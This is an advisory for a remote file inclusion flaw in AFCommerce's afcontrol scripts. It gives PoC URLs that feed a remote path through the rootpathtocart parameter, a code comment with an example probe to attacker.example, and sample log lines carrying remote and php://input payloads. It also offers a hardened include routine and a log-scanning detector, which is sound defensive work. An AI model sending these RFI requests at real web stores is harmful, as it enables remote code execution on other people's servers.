[o] AFCommerce a.k.a. Amazing Flash Commerce - Remote File Inclusion Vulnerability
Software : AFCommerce Professional Edition
Version : n/a
Vendor : http://www.afcommerce.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : AFCommerce is a full and complete online store with both a store front and administration area directly out of the box, which can be easily installed, configured, and maintained over a web-based interface. AFCommerce now includes the vendor's e-commerce website building software integrated with its free shopping cart. This allows you to create an unlimited number of custom web pages and to customize the fonts and colors of all your pages, as well as the structural layout of your website.
=============================================================================================================
[o] Vuln
The three scripts below (all under afcontrol/) build an include path from $rootpathtocart without validating it. The PoC relies on that variable being populated straight from the query string (register_globals, or an equivalent assignment in the application); when PHP additionally runs with allow_url_include=On, include_once fetches and executes the attacker's file. With allow_url_include=Off the remote include fails but the parameter still controls the local path that is concatenated before "/admin/..." and "/mods/adminfiles/...".
adblock.php
adminpassword.php
controlheader.php
include_once ($rootpathtocart . "/admin/customadminfooter.php");
include_once ($rootpathtocart . "/mods/adminfiles/adminpassword.php");
include_once ($rootpathtocart . "/mods/adminfiles/controlheader.php");
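Why the include lines above are exploitable, and one way to harden them, as an added example. This is not AFCommerce's code: the file names and $rootpathtocart come from the advisory, the layout (scripts in <cartroot>/afcontrol/) is assumed from the PoC URLs, and cart_root() / safe_include() are illustrative names.

```php
<?php
// Added example, not AFCommerce code. File names and $rootpathtocart are from
// the advisory; the directory layout and helper names are assumptions.

// --- Vulnerable pattern (as described in the advisory) -------------------
// With register_globals=On (or an explicit extract($_GET)), a request such as
//   /afcontrol/adblock.php?rootpathtocart=http://attacker.example/
// sets $rootpathtocart before the script runs. PHP then resolves
// "http://attacker.example//admin/customadminfooter.php" and, if
// allow_url_include=On, downloads and executes it. Not invoked here.
function vulnerable_include(): void
{
    global $rootpathtocart;                               // attacker-controlled
    include_once ($rootpathtocart . "/admin/customadminfooter.php");
}

// --- Hardened pattern ----------------------------------------------------
// 1. Derive the cart root from this script's own location, never from input.
// 2. Overwrite any request-supplied $rootpathtocart so a register_globals
//    assignment cannot survive into later code.
// 3. Resolve the final path and check it stays under the root before including.
function cart_root(): string
{
    // Assumes this file lives in <cartroot>/afcontrol/, as the PoC URLs imply.
    $root = realpath(dirname(__DIR__));
    if ($root === false) {
        throw new RuntimeException('cannot resolve cart root');
    }
    return $root;
}

function safe_include(string $relative): void
{
    $root   = cart_root();
    $target = realpath($root . DIRECTORY_SEPARATOR . ltrim($relative, '/\\'));

    // realpath() returns false for missing files and for stream wrappers
    // (http://, php://, data:), and collapses "../", so a prefix check against
    // the resolved root rejects remote includes and traversal alike.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($target === false || strncmp($target, $prefix, strlen($prefix)) !== 0) {
        error_log('refused include outside cart root: ' . $relative);
        http_response_code(500);
        exit;
    }
    include_once $target;
}

// Explicitly clobber the variable the PoC abuses, then include by fixed name.
$rootpathtocart = cart_root();

safe_include('admin/customadminfooter.php');
safe_include('mods/adminfiles/adminpassword.php');
safe_include('mods/adminfiles/controlheader.php');
```

Independently of the code change, the server-side settings that make the PoC work should be off in php.ini: register_globals (removed in PHP 5.4, but relevant to installations of this era) and allow_url_include. Turning allow_url_include off alone is not a fix, because the parameter still chooses the local path.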
=============================================================================================================
[o] Poc
http://localhost/afcontrol/adblock.php?rootpathtocart=[RFI]
http://localhost/afcontrol/adminpassword.php?rootpathtocart=[RFI]
http://localhost/afcontrol/controlheader.php?rootpathtocart=[RFI]
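For defenders, the PoC URLs above are easy to spot in web server access logs. The following is an added detection example, not part of the advisory: it flags requests to the three affected scripts whose rootpathtocart value carries a URL scheme or PHP stream wrapper. The log lines are constructed for the example, and the function names are illustrative.

```php
<?php
// Added example, not part of the advisory. Scans combined-format access log
// lines for RFI probes against the three scripts named in the PoC.

const AFFECTED_SCRIPTS = ['adblock.php', 'adminpassword.php', 'controlheader.php'];

// $request_line is the quoted request field, e.g.
//   GET /afcontrol/adblock.php?rootpathtocart=http://x/ HTTP/1.1
function is_rfi_probe(string $request_line): bool
{
    if (!preg_match('#^\S+\s+(\S+)\s+HTTP/#', $request_line, $m)) {
        return false;
    }
    // Split path and query by hand; parse_url() is not needed for a
    // server-relative target and can be confused by "://" in the query.
    $parts = explode('?', $m[1], 2);
    if (count($parts) !== 2) {
        return false;
    }
    if (!in_array(basename($parts[0]), AFFECTED_SCRIPTS, true)) {
        return false;
    }
    parse_str($parts[1], $params);                 // also URL-decodes values
    if (!isset($params['rootpathtocart']) || !is_string($params['rootpathtocart'])) {
        return false;                              // absent, or rootpathtocart[]=...
    }
    // A remote include needs a scheme (http://, https://, ftp://) or a PHP
    // wrapper (php://, data:, expect://). No scheme belongs in a local path.
    return (bool) preg_match('#^[a-z][a-z0-9+.-]*:#i', $params['rootpathtocart']);
}

// Returns the offending lines from a block of combined-format log text.
function scan_log(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        // The request is the first double-quoted field in combined format.
        if (preg_match('/"([^"]*)"/', $line, $m) && is_rfi_probe($m[1])) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// Constructed sample log: one remote probe, one benign request, one wrapper probe.
$sample_log = <<<'LOG'
203.0.113.5 - - [25/Dec/2013:10:00:01 +0900] "GET /afcontrol/adblock.php?rootpathtocart=http://203.0.113.9/s.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.2 - - [25/Dec/2013:10:00:02 +0900] "GET /afcontrol/adblock.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Dec/2013:10:00:03 +0900] "GET /afcontrol/controlheader.php?rootpathtocart=php://input HTTP/1.1" 200 301 "-" "curl/7.30"
LOG;

foreach (scan_log($sample_log) as $hit) {
    echo "RFI probe: {$hit}\n";                  // prints lines 1 and 3 of the sample
}
```

The scheme check deliberately does not whitelist specific hosts: any scheme in a value meant to be a filesystem prefix is a probe, and the wrapper forms (php://input, data:) never leave the attacker's IP in the URL, so matching on "http://" alone would miss them.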
=============================================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{
=============================================================================================================
[o] December 25 2013 - Papua, Indonesia || Merry Christmas!! May the Lord Jesus bless you... :)